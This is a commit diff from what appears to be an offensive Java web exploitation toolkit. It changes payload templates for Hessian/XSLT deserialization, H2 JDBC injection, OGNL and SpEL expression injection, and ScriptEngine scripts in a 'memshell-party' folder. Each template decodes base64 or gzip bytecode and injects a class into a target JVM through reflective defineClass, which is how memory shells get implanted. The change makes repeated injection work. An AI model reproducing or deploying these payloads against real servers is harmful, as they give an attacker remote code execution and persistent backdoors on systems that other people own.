feat: support multi call for probe

Author: ReaJason

packer/src/main/java/com/reajason/javaweb/packer/deserialize/hessian/XSLTScriptEngine.java

@@ -24,7 +24,7 @@ public static Object generate(byte[] bytes, String className) {
                 "                xmlns:se=\"http://xml.apache.org/xalan/java/javax.script.ScriptEngineManager\"\n" +
                 "                xmlns:js=\"http://xml.apache.org/xalan/java/javax.script.ScriptEngine\">\n" +
                 "    <xsl:template match=\"/\">\n" +
-                "        <xsl:variable name=\"js\" select=\"&quot;var classLoader = java.lang.Thread.currentThread().getContextClassLoader();var className = '" + className + "';var base64Str = '" + base64Str + "';try { classLoader.loadClass(className).newInstance();} catch (e) { var clsString = classLoader.loadClass('java.lang.String'); var bytecode; try { var clsBase64 = classLoader.loadClass('java.util.Base64'); var clsDecoder = classLoader.loadClass('java.util.Base64$Decoder'); var decoder = clsBase64.getMethod('getDecoder').invoke(base64Clz); bytecode = clsDecoder.getMethod('decode', clsString).invoke(decoder, base64Str); } catch (ee) { try { var datatypeConverterClz = classLoader.loadClass('javax.xml.bind.DatatypeConverter'); bytecode = datatypeConverterClz.getMethod('parseBase64Binary', clsString).invoke(datatypeConverterClz, base64Str); } catch (eee) { var clazz1 = classLoader.loadClass('sun.misc.BASE64Decoder'); bytecode = clazz1.newInstance().decodeBuffer(base64Str); } } var clsClassLoader = classLoader.loadClass('java.lang.ClassLoader'); var clsByteArray = (new java.lang.String('a').getBytes().getClass()); var clsInt = java.lang.Integer.TYPE; var defineClass = clsClassLoader.getDeclaredMethod('defineClass', [clsByteArray, clsInt, clsInt]); defineClass.setAccessible(true); var clazz = defineClass.invoke(classLoader, bytecode, new java.lang.Integer(0), new java.lang.Integer(bytecode.length)); clazz.newInstance();}new java.io.File('" + tmpPath + "').delete()&quot;\" />\n" +
+                "        <xsl:variable name=\"js\" select=\"&quot;var classLoader = new java.net.URLClassLoader(java.lang.reflect.Array.newInstance(java.lang.Class.forName(\"java.net.URL\"), 0));var className = '" + className + "';var base64Str = '" + base64Str + "';try { classLoader.loadClass(className).newInstance();} catch (e) { var clsString = classLoader.loadClass('java.lang.String'); var bytecode; try { var clsBase64 = classLoader.loadClass('java.util.Base64'); var clsDecoder = classLoader.loadClass('java.util.Base64$Decoder'); var decoder = clsBase64.getMethod('getDecoder').invoke(base64Clz); bytecode = clsDecoder.getMethod('decode', clsString).invoke(decoder, base64Str); } catch (ee) { try { var datatypeConverterClz = classLoader.loadClass('javax.xml.bind.DatatypeConverter'); bytecode = datatypeConverterClz.getMethod('parseBase64Binary', clsString).invoke(datatypeConverterClz, base64Str); } catch (eee) { var clazz1 = classLoader.loadClass('sun.misc.BASE64Decoder'); bytecode = clazz1.newInstance().decodeBuffer(base64Str); } } var clsClassLoader = classLoader.loadClass('java.lang.ClassLoader'); var clsByteArray = (new java.lang.String('a').getBytes().getClass()); var clsInt = java.lang.Integer.TYPE; var defineClass = clsClassLoader.getDeclaredMethod('defineClass', [clsByteArray, clsInt, clsInt]); defineClass.setAccessible(true); var clazz = defineClass.invoke(classLoader, bytecode, new java.lang.Integer(0), new java.lang.Integer(bytecode.length)); clazz.newInstance();}new java.io.File('" + tmpPath + "').delete()&quot;\" />\n" +
                 "        <xsl:variable name=\"result\" select=\"js:eval(se:getEngineByName(se:new(),'js'), $js)\"/>\n" +
                 "        <xsl:value-of select=\"$result\"/>\n" +
                 "    </xsl:template>\n" +

packer/src/main/java/com/reajason/javaweb/packer/h2/H2JavacPacker.java

@@ -20,7 +20,7 @@ public class H2JavacPacker implements Packer {
             "}" +
             "java.lang.reflect.Method defMethod=java.lang.ClassLoader.class.getDeclaredMethod(\"defineClass\",bytes.getClass(),int.class,int.class)\\;" +
             "defMethod.setAccessible(true)\\;" +
-            "java.lang.Class myclass=(java.lang.Class)defMethod.invoke(java.lang.Thread.currentThread().getContextClassLoader(),bytes,0,bytes.length)\\;" +
+            "java.lang.Class myclass=(java.lang.Class)defMethod.invoke(new java.net.URLClassLoader(new java.net.URL[0]),bytes,0,bytes.length)\\;" +
             "myclass.newInstance()\\;" +
             "return null\\;" +
             "}'\\;" +
@@ -44,7 +44,7 @@ public class H2JavacPacker implements Packer {
             "} catch (Throwable e) {}" +
             "java.lang.reflect.Method defMethod=java.lang.ClassLoader.class.getDeclaredMethod(\"defineClass\",bytes.getClass(),int.class,int.class)\\;" +
             "defMethod.setAccessible(true)\\;" +
-            "java.lang.Class myclass=(java.lang.Class)defMethod.invoke(java.lang.Thread.currentThread().getContextClassLoader(),bytes,0,bytes.length)\\;" +
+            "java.lang.Class myclass=(java.lang.Class)defMethod.invoke(new java.net.URLClassLoader(new java.net.URL[0]),bytes,0,bytes.length)\\;" +
             "myclass.newInstance()\\;" +
             "return null\\;" +
             "}'\\;" +

packer/src/main/java/com/reajason/javaweb/packer/ognl/OGNLSpringGzipJDK17Packer.java

@@ -12,7 +12,7 @@
  * @since 2025/7/7
  */
 public class OGNLSpringGzipJDK17Packer implements Packer {
-    String template = "(@org.springframework.cglib.core.ReflectUtils@defineClass('{{className}}',@org.springframework.util.StreamUtils@copyToByteArray(new java.util.zip.GZIPInputStream(new java.io.ByteArrayInputStream(@org.springframework.util.Base64Utils@decodeFromString('{{base64Str}}')))),@java.lang.Thread@currentThread().getContextClassLoader(),null,@java.lang.Class@forName('org.springframework.expression.ExpressionParser'))).newInstance()";
+    String template = "(@org.springframework.cglib.core.ReflectUtils@defineClass('{{className}}',@org.springframework.util.StreamUtils@copyToByteArray(new java.util.zip.GZIPInputStream(new java.io.ByteArrayInputStream(@org.springframework.util.Base64Utils@decodeFromString('{{base64Str}}')))),new java.net.URLClassLoader(new java.net.URL[0]),null,@java.lang.Class@forName('org.springframework.expression.ExpressionParser'))).newInstance()";
 
     @Override
     @SneakyThrows

packer/src/main/java/com/reajason/javaweb/packer/ognl/OGNLSpringGzipPacker.java

@@ -10,7 +10,7 @@
  * @since 2025/7/7
  */
 public class OGNLSpringGzipPacker implements Packer {
-    String template = "(@org.springframework.cglib.core.ReflectUtils@defineClass('{{className}}',@org.springframework.util.StreamUtils@copyToByteArray(new java.util.zip.GZIPInputStream(new java.io.ByteArrayInputStream(@org.springframework.util.Base64Utils@decodeFromString('{{base64Str}}')))),@java.lang.Thread@currentThread().getContextClassLoader())).newInstance()";
+    String template = "(@org.springframework.cglib.core.ReflectUtils@defineClass('{{className}}',@org.springframework.util.StreamUtils@copyToByteArray(new java.util.zip.GZIPInputStream(new java.io.ByteArrayInputStream(@org.springframework.util.Base64Utils@decodeFromString('{{base64Str}}')))),new java.net.URLClassLoader(new java.net.URL[0]))).newInstance()";
 
     @Override
     @SneakyThrows

packer/src/main/java/com/reajason/javaweb/packer/spel/SpELSpringGzipJDK17Packer.java

@@ -9,7 +9,7 @@
  * @since 2024/12/13
  */
 public class SpELSpringGzipJDK17Packer implements Packer {
-    String template = "T(org.springframework.cglib.core.ReflectUtils).defineClass('{{className}}',T(org.springframework.util.StreamUtils).copyToByteArray(new java.util.zip.GZIPInputStream(new java.io.ByteArrayInputStream(T(org.springframework.util.Base64Utils).decodeFromString('{{base64Str}}')))),T(java.lang.Thread).currentThread().getContextClassLoader(),null,T(java.lang.Class).forName('org.springframework.expression.ExpressionParser')).newInstance()";
+    String template = "T(org.springframework.cglib.core.ReflectUtils).defineClass('{{className}}',T(org.springframework.util.StreamUtils).copyToByteArray(new java.util.zip.GZIPInputStream(new java.io.ByteArrayInputStream(T(org.springframework.util.Base64Utils).decodeFromString('{{base64Str}}')))),new java.net.URLClassLoader(new java.net.URL[0]),null,T(java.lang.Class).forName('org.springframework.expression.ExpressionParser')).newInstance()";
 
     @Override
     public String pack(ClassPackerConfig config) {

packer/src/main/java/com/reajason/javaweb/packer/spel/SpELSpringGzipPacker.java

@@ -14,7 +14,7 @@
  * @since 2024/12/13
  */
 public class SpELSpringGzipPacker implements Packer {
-    String template = "T(org.springframework.cglib.core.ReflectUtils).defineClass('{{className}}',T(org.springframework.util.StreamUtils).copyToByteArray(new java.util.zip.GZIPInputStream(new java.io.ByteArrayInputStream(T(org.springframework.util.Base64Utils).decodeFromString('{{base64Str}}')))),T(java.lang.Thread).currentThread().getContextClassLoader()).newInstance()";
+    String template = "T(org.springframework.cglib.core.ReflectUtils).defineClass('{{className}}',T(org.springframework.util.StreamUtils).copyToByteArray(new java.util.zip.GZIPInputStream(new java.io.ByteArrayInputStream(T(org.springframework.util.Base64Utils).decodeFromString('{{base64Str}}')))),new java.net.URLClassLoader(new java.net.URL[0])).newInstance()";
 
     @Override
     public String pack(ClassPackerConfig config) {

packer/src/main/resources/memshell-party/ScriptEngine.js

@@ -13,5 +13,5 @@ var clsByteArray = (new java.lang.String("a").getBytes().getClass());
 var clsInt = java.lang.Integer.TYPE;
 var defineClass = java.lang.Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", [clsString, clsByteArray, clsInt, clsInt]);
 defineClass.setAccessible(true);
-var clazz = defineClass.invoke(java.lang.Thread.currentThread().getContextClassLoader(), className, bytecode, new java.lang.Integer(0), new java.lang.Integer(bytecode.length));
+var clazz = defineClass.invoke(new java.net.URLClassLoader(java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.net.URL"), 0)), className, bytecode, new java.lang.Integer(0), new java.lang.Integer(bytecode.length));
 clazz.newInstance();

packer/src/main/resources/memshell-party/ScriptEngineBigInteger.js

@@ -6,5 +6,5 @@ var clsByteArray = (new java.lang.String("a").getBytes().getClass());
 var clsInt = java.lang.Integer.TYPE;
 var defineClass = java.lang.Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", [clsString, clsByteArray, clsInt, clsInt]);
 defineClass.setAccessible(true);
-var clazz = defineClass.invoke(java.lang.Thread.currentThread().getContextClassLoader(), className, bytecode, new java.lang.Integer(0), new java.lang.Integer(bytecode.length));
+var clazz = defineClass.invoke(new java.net.URLClassLoader(java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.net.URL"), 0)), className, bytecode, new java.lang.Integer(0), new java.lang.Integer(bytecode.length));
 clazz.newInstance();

packer/src/main/resources/memshell-party/ScriptEngineNoSquareBrackets.js

@@ -18,5 +18,5 @@ java.lang.reflect.Array.set(pTypes, 2, clsInt);
 java.lang.reflect.Array.set(pTypes, 3, clsInt);
 var defineClass = java.lang.Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", pTypes);
 defineClass.setAccessible(true);
-var clazz = defineClass.invoke(java.lang.Thread.currentThread().getContextClassLoader(), className, bytecode, new java.lang.Integer(0), new java.lang.Integer(bytecode.length));
+var clazz = defineClass.invoke(new java.net.URLClassLoader(java.lang.reflect.Array.newInstance(java.lang.Class.forName("java.net.URL"), 0)), className, bytecode, new java.lang.Integer(0), new java.lang.Integer(bytecode.length));
 clazz.newInstance();